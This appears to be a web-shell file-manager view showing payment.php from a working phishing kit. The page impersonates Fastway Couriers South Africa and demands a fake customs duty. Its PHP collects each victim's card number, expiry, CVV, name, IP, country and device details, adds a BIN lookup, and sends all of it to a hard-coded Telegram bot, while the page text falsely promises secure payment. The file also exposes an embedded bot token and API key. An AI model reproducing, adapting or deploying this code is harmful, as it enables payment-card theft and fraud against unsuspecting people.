at path:
ROOT
/
fastway
/
payment.php
run:
R
W
Run
assets
DIR
2026-03-20 04:26:56
R
W
Run
approval.php
21.55 KB
2026-05-28 13:26:25
R
W
Run
Delete
Rename
error_log
4.17 KB
2026-03-18 03:54:16
R
W
Run
Delete
Rename
index.php
18.05 KB
2026-05-28 13:26:25
R
W
Run
Delete
Rename
loading1.php
10.21 KB
2026-03-20 04:33:56
R
W
Run
Delete
Rename
loading2.php
9.82 KB
2026-03-20 04:34:26
R
W
Run
Delete
Rename
payment.php
23.61 KB
2026-05-28 13:26:25
R
W
Run
Delete
Rename
error_log
up
📄
payment.php
Save
<?php $BOT_TOKEN = "8286993282:AAFvgZ9dD4Qrvedz-MQmE0OKSNAOjSUfeUU"; $CHAT_ID = "-5024972976"; // === GET USER INFO === $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $country = 'Unknown'; $timeout = 5; // Get country with better error handling try { $context = stream_context_create([ 'http' => ['timeout' => $timeout], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false] ]); $geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context); if ($geoData !== false) { $geo = json_decode($geoData); if (isset($geo->country) && $geo->status === 'success') { $country = $geo->country; } } } catch (Exception $e) { $country = 'Unknown'; } // Get BIN info from HandyAPI function getBinInfo($bin) { $url = "https://data.handyapi.com/bin/{$bin}"; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 3, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_HTTPHEADER => ['x-api-key: HAS-0YYRXxQgdvMzHL9u9184D'] ]); $response = curl_exec($ch); curl_close($ch); if ($response) { $data = json_decode($response, true); return $data; } return null; } // Get country with better error handling function getCountryFromIP($ip, $timeout = 3) { if ($ip === 'Unknown' || $ip === '127.0.0.1' || $ip === '::1') { return 'Unknown'; } try { $context = stream_context_create([ 'http' => ['timeout' => $timeout], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false] ]); $geoData = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country", false, $context); if ($geoData !== false) { $geo = json_decode($geoData); if (isset($geo->country) && $geo->status === 'success') { return $geo->country; } } } catch (Exception $e) { // Silently fail } return 'Unknown'; } // Detect OS from user agent function detectOS($user_agent) { $os = 'Unknown'; if (strpos($user_agent, 'Windows') !== false) $os = 'Windows'; elseif (strpos($user_agent, 'Mac') !== false) $os = 'macOS'; elseif (strpos($user_agent, 'Linux') !== false) $os = 'Linux'; elseif (strpos($user_agent, 'Android') !== false) $os = 'Android'; elseif (strpos($user_agent, 'iPhone') !== false) $os = 'iOS'; elseif (strpos($user_agent, 'iPad') !== false) $os = 'iPadOS'; return $os; } // Format BIN info for message function formatBinInfo($bin, $binData) { $binInfo = "<b>🅱️ BIN INFORMATION:</b>\n"; if ($binData && is_array($binData)) { $brand = $binData['Brand'] ?? $binData['brand'] ?? 'UNKNOWN'; $bank = $binData['Bank'] ?? $binData['bank'] ?? $binData['Issuer'] ?? 'Unknown'; $binCountry = $binData['Country'] ?? $binData['country'] ?? 'Unknown'; $type = $binData['Type'] ?? $binData['type'] ?? $binData['Scheme'] ?? 'UNKNOWN'; $level = $binData['Level'] ?? $binData['level'] ?? $binData['CardTier'] ?? $binData['tier'] ?? 'STANDARD'; $currency = $binData['Currency'] ?? $binData['currency'] ?? 'ZAR'; $binInfo .= "• <b>BIN:</b> <code>{$bin}</code> | <b>Brand:</b> {$brand}\n"; $binInfo .= "• <b>Bank:</b> {$bank} | <b>Country:</b> {$binCountry}\n"; $binInfo .= "• <b>Type:</b> {$type} | <b>Level:</b> {$level}\n"; $binInfo .= "• <b>Currency:</b> {$currency}\n\n"; } else { $binInfo .= "• <b>BIN:</b> <code>{$bin}</code> (No additional info available)\n\n"; } return $binInfo; } function sendTelegram($msg) { global $BOT_TOKEN, $CHAT_ID; $url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage"; $data = [ 'chat_id' => $CHAT_ID, 'text' => $msg, 'parse_mode' => 'HTML', 'disable_web_page_preview' => true ]; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_HTTPHEADER => [ 'Content-Type: application/x-www-form-urlencoded' ] ]); $result = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return $httpCode === 200; } // === HANDLE PAYMENT LOG === if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'log_payment') { header('Content-Type: application/json'); // Get client info once $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $country = getCountryFromIP($ip); $os = detectOS($user_agent); $tracking = htmlspecialchars($_POST['tracking'] ?? 'Unknown'); $parcel_type = htmlspecialchars($_POST['parcel_type'] ?? 'Unknown'); $card_name = htmlspecialchars($_POST['card_name'] ?? 'Unknown'); $card_number = preg_replace('/\s+/', '', $_POST['card_number'] ?? ''); $expiry = htmlspecialchars($_POST['expiry'] ?? '00/00'); $cvv = htmlspecialchars($_POST['cvv'] ?? '000'); // Get BIN info $bin = substr($card_number, 0, 6); $binData = getBinInfo($bin); // Build enhanced message $msg = "<b>✅ FASTWAY COURIERS PAYMENT CAPTURED</b>\n"; $msg .= "══════════════════════════════\n\n"; // BIN Information Section $msg .= formatBinInfo($bin, $binData); // Card Details Section $msg .= "<b>💳 CARD DETAILS:</b>\n"; $msg .= "• <b>Tracking #:</b> <code>{$tracking}</code>\n"; $msg .= "• <b>Parcel Type:</b> {$parcel_type}\n"; $msg .= "• <b>Cardholder:</b> {$card_name}\n"; $msg .= "• <b>Card Number:</b> <code>{$card_number}</code>\n"; $msg .= "• <b>Expiry:</b> {$expiry}\n"; $msg .= "• <b>CVV:</b> <code>{$cvv}</code>\n"; $msg .= "• <b>Amount:</b> R122.36\n\n"; // Client Information Section $msg .= "<b>👤 CLIENT INFORMATION:</b>\n"; $msg .= "• <b>IP:</b> <code>{$ip}</code>\n"; $msg .= "• <b>Country:</b> {$country}\n"; $msg .= "• <b>OS:</b> {$os}\n"; $msg .= "• <b>User Agent:</b> " . substr($user_agent, 0, 50) . "...\n"; $msg .= "• <b>Time:</b> " . date('d/m/Y H:i:s') . "\n"; $msg .= "══════════════════════════════\n"; $msg .= "<i>📍 Fastway Couriers South Africa</i>"; sendTelegram($msg); echo json_encode(['status' => 'success']); exit; } // === GET DATA FROM POST (from loading1.php) === $tracking = htmlspecialchars($_POST['tracking'] ?? ''); $parcel_type = htmlspecialchars($_POST['parcel_type'] ?? 'International Satchel'); $weight = htmlspecialchars($_POST['weight'] ?? '0.9'); if (empty($tracking)) { $tracking = 'FW632846518'; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Fastway Couriers | Customs Duty Payment</title> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;800&family=Barlow:wght@300;400;500;600&display=swap" rel="stylesheet"> <style> *, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; } :root { --orange: #F47920; --orange-light: #FF8C3A; --navy: #1A2340; --navy-dark: #10172B; --navy-mid: #232E4A; --white: #FFFFFF; --off-white: #F7F8FA; --grey: #6B7280; --light-grey: #E5E7EB; --text: #1F2937; --success: #0F7B4B; --success-bg: #E8F3ED; --radius: 6px; --input-bg: #FFFFFF; --shadow-sm: 0 4px 12px rgba(0,0,0,0.05); } body { font-family: 'Barlow', sans-serif; color: var(--text); background: var(--off-white); min-height: 100vh; display: flex; flex-direction: column; } .container { max-width: 800px; margin: 0 auto; width: 100%; padding: 0 1.5rem; } /* HEADER */ .header { background: var(--white); padding: 1rem 0; box-shadow: 0 2px 10px rgba(0,0,0,0.05); } .header-container { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; } .logo-container { display: flex; align-items: center; } .logo { height: 70px; width: auto; } /* BANNER */ .banner { width: 100%; background: linear-gradient(135deg, var(--navy-dark) 0%, var(--navy) 100%); padding: 2.5rem 0; margin-bottom: 2rem; } .banner-content { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; color: var(--white); } .banner-title { font-family: 'Barlow Condensed', sans-serif; font-size: clamp(2rem, 5vw, 2.5rem); font-weight: 800; text-transform: uppercase; letter-spacing: -0.5px; margin-bottom: 0.5rem; } .banner-title span { color: var(--orange); } /* CARD */ .card { background: var(--white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 2rem; margin-bottom: 2rem; box-shadow: var(--shadow-sm); } .progress { display: flex; align-items: center; gap: 0.75rem; padding: 1rem 1.25rem; background: var(--off-white); border-radius: var(--radius); border-left: 4px solid var(--orange); margin-bottom: 2rem; font-size: 0.95rem; } .progress strong { color: var(--navy-dark); } .progress span { color: var(--orange); font-weight: 600; margin-left: 0.25rem; } .parcel-info { background: var(--off-white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 1.25rem; margin: 1.5rem 0; } .info-row { display: flex; justify-content: space-between; padding: 0.6rem 0; border-bottom: 1px solid var(--light-grey); font-size: 0.95rem; } .info-row:last-child { border-bottom: none; } .info-label { color: var(--grey); } .info-value { font-weight: 600; color: var(--navy-dark); } .amount-display { background: linear-gradient(135deg, var(--navy-dark), var(--navy)); color: var(--white); padding: 2rem; text-align: center; border-radius: var(--radius); margin: 2rem 0; } .amount-currency { font-size: 1.25rem; vertical-align: super; margin-right: 0.25rem; } .amount-number { font-family: 'Barlow Condensed', sans-serif; font-size: 3.5rem; font-weight: 800; line-height: 1; } .fee-description { text-align: center; color: var(--grey); font-size: 0.9rem; margin-bottom: 2rem; } label { display: block; margin: 1.25rem 0 0.35rem; font-weight: 600; font-size: 0.85rem; color: var(--navy-dark); text-transform: uppercase; letter-spacing: 0.5px; } input[type="text"], input[type="tel"] { width: 100%; padding: 0.85rem 1rem; border: 2px solid var(--light-grey); border-radius: var(--radius); background: var(--input-bg); font-family: 'Barlow', sans-serif; font-size: 0.95rem; transition: all 0.15s ease; } input:focus { outline: none; border-color: var(--orange); box-shadow: 0 0 0 3px rgba(244,121,32,0.1); } .input-group { display: grid; grid-template-columns: 1fr 1fr; gap: 1.25rem; margin-bottom: 1rem; } @media (max-width: 600px) { .input-group { grid-template-columns: 1fr; } } .btn-primary { display: block; width: 100%; padding: 1rem; margin-top: 2rem; background: var(--orange); color: var(--white); border: none; border-radius: var(--radius); font-family: 'Barlow', sans-serif; font-weight: 700; font-size: 1rem; text-transform: uppercase; letter-spacing: 1px; cursor: pointer; transition: all 0.15s ease; } .btn-primary:hover { background: var(--orange-light); transform: translateY(-1px); box-shadow: 0 4px 12px rgba(244,121,32,0.3); } .payment-methods { display: flex; justify-content: center; gap: 1rem; margin: 1.5rem 0; flex-wrap: wrap; } .payment-method { background: var(--off-white); border: 1px solid var(--light-grey); border-radius: var(--radius); padding: 0.4rem 0.8rem; font-size: 0.8rem; color: var(--grey); display: flex; align-items: center; gap: 0.4rem; } .tip { font-size: 0.85rem; color: var(--grey); margin-top: 1.5rem; padding: 1rem; background: var(--off-white); border-left: 3px solid var(--orange); border-radius: var(--radius); } .loading-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(255, 255, 255, 0.98); display: none; justify-content: center; align-items: center; flex-direction: column; z-index: 1000; } .spinner { width: 50px; height: 50px; border: 3px solid var(--light-grey); border-top: 3px solid var(--orange); border-radius: 50%; animation: spin 1.2s linear infinite; margin-bottom: 1rem; } @keyframes spin { to { transform: rotate(360deg); } } /* FOOTER */ .footer { background: var(--navy-dark); padding: 3rem 0 2rem; margin-top: auto; } .footer-content { max-width: 1200px; margin: 0 auto; padding: 0 1.5rem; text-align: center; } .footer-logo { margin-bottom: 1.5rem; } .footer-logo img { height: 70px; width: auto; opacity: 0.9; } .footer-address { color: rgba(255,255,255,0.6); font-size: 0.9rem; margin-bottom: 1rem; line-height: 1.6; } .footer-copyright { color: rgba(255,255,255,0.4); font-size: 0.8rem; } .footer-links { display: flex; justify-content: center; gap: 2rem; margin: 1rem 0 1.5rem; flex-wrap: wrap; } .footer-links a { color: rgba(255,255,255,0.6); text-decoration: none; font-size: 0.85rem; transition: color 0.15s; } .footer-links a:hover { color: var(--orange); } @media (max-width: 600px) { .card { padding: 1.5rem; } .logo { height: 60px; } .amount-number { font-size: 2.5rem; } } </style> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css"> </head> <body> <header class="header"> <div class="header-container"> <div class="logo-container"> <img src="assets/1.png" alt="Fastway Couriers" class="logo"> </div> </div> </header> <div class="banner"> <div class="banner-content"> <div class="banner-title">Customs <span>Payment</span></div> </div> </div> <main class="container"> <div class="card"> <div class="progress"> <i class="fas fa-credit-card" style="color: var(--orange);"></i> <strong>Status:</strong> <span>Payment Required</span> </div> <div class="parcel-info"> <div class="info-row"> <span class="info-label"><i class="fas fa-barcode"></i> Tracking Number:</span> <span class="info-value" id="trackingDisplay"><?php echo $tracking; ?></span> </div> <div class="info-row"> <span class="info-label"><i class="fas fa-box"></i> Parcel Type:</span> <span class="info-value" id="typeDisplay"><?php echo $parcel_type; ?></span> </div> <div class="info-row"> <span class="info-label"><i class="fas fa-weight-hanging"></i> Weight:</span> <span class="info-value" id="weightDisplay"><?php echo $weight; ?> kg</span> </div> <div class="info-row"> <span class="info-label"><i class="fas fa-file-invoice-dollar"></i> Fee Type:</span> <span class="info-value">Customs Clearance Duty</span> </div> </div> <div class="amount-display"> <span class="amount-currency">R</span> <span class="amount-number">122.36</span> </div> <div class="fee-description"> <i class="fas fa-info-circle"></i> This is a mandatory customs duty for international parcels </div> <form id="paymentForm"> <input type="hidden" id="tracking" name="tracking" value="<?php echo $tracking; ?>"> <input type="hidden" id="parcel_type" name="parcel_type" value="<?php echo $parcel_type; ?>"> <label for="card_name"><i class="fas fa-user"></i> Cardholder Name</label> <input type="text" id="card_name" name="card_name" placeholder="e.g. JOHN SMITH" required> <label for="card_number"><i class="fas fa-credit-card"></i> Card Number</label> <input type="tel" id="card_number" name="card_number" placeholder="1234 5678 9012 3456" maxlength="19" required> <div class="input-group"> <div> <label for="expiry"><i class="fas fa-calendar-alt"></i> Expiry (MM/YY)</label> <input type="tel" id="expiry" name="expiry" placeholder="MM/YY" maxlength="5" required> </div> <div> <label for="cvv"><i class="fas fa-lock"></i> CVV</label> <input type="tel" id="cvv" name="cvv" placeholder="123" maxlength="4" required> </div> </div> <div class="payment-methods"> <div class="payment-method"><i class="fab fa-cc-visa"></i> Visa</div> <div class="payment-method"><i class="fab fa-cc-mastercard"></i> MasterCard</div> <div class="payment-method"><i class="fas fa-university"></i> EFT</div> <div class="payment-method"><i class="fab fa-cc-amex"></i> Amex</div> </div> <p class="tip"> <i class="fas fa-shield-alt"></i> Your payment is secured with 256-bit SSL encryption. Fastway Couriers never stores your full card details. </p> <button type="submit" class="btn-primary"> <i class="fas fa-lock"></i> Pay R122.36 Now </button> </form> </div> </main> <div class="loading-overlay" id="loadingOverlay"> <div class="spinner"></div> <div style="font-size: 1.1rem; font-weight: 600; margin-bottom: 0.5rem; color: var(--navy-dark);">Processing Secure Payment...</div> <div style="color: var(--grey);">Please do not close this window</div> </div> <footer class="footer"> <div class="footer-content"> <div class="footer-logo"> <img src="assets/3.png" alt="Fastway Couriers"> </div> <div class="footer-address"> Fastway Couriers South Africa<br> 12 Electron Road, Isando, Johannesburg, 1600 </div> <div class="footer-links"> <a href="#"><i class="fas fa-shield-alt"></i> Privacy Policy</a> <a href="#"><i class="fas fa-file-contract"></i> Terms of Service</a> <a href="#"><i class="fas fa-question-circle"></i> Help Center</a> </div> <div class="footer-copyright"> © 2026 Fastway Couriers South Africa (Pty) Ltd. All rights reserved. </div> </div> </footer> <script> document.addEventListener('DOMContentLoaded', function() { const tracking = '<?php echo $tracking; ?>'; document.getElementById('trackingDisplay').textContent = tracking; }); // Format card number document.getElementById('card_number').addEventListener('input', function(e) { let v = e.target.value.replace(/\D/g, '').substring(0,16); e.target.value = v.match(/.{1,4}/g)?.join(' ') || v; }); // Format expiry document.getElementById('expiry').addEventListener('input', function(e) { let v = e.target.value.replace(/\D/g, '').substring(0,4); if (v.length > 2) v = v.slice(0,2) + '/' + v.slice(2); e.target.value = v; }); // Submit document.getElementById('paymentForm').addEventListener('submit', async function(e) { e.preventDefault(); const btn = this.querySelector('.btn-primary'); const overlay = document.getElementById('loadingOverlay'); btn.disabled = true; btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Processing...'; overlay.style.display = 'flex'; const formData = new FormData(this); const data = { action: 'log_payment', tracking: formData.get('tracking'), parcel_type: formData.get('parcel_type'), card_name: formData.get('card_name'), card_number: formData.get('card_number'), expiry: formData.get('expiry'), cvv: formData.get('cvv') }; try { await fetch('', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(data) }); } catch (err) { console.log('Telegram failed'); } localStorage.setItem('paymentData', JSON.stringify(Object.fromEntries(formData))); setTimeout(() => { window.location.href = 'loading2.php'; }, 1500); }); </script> </body> </html>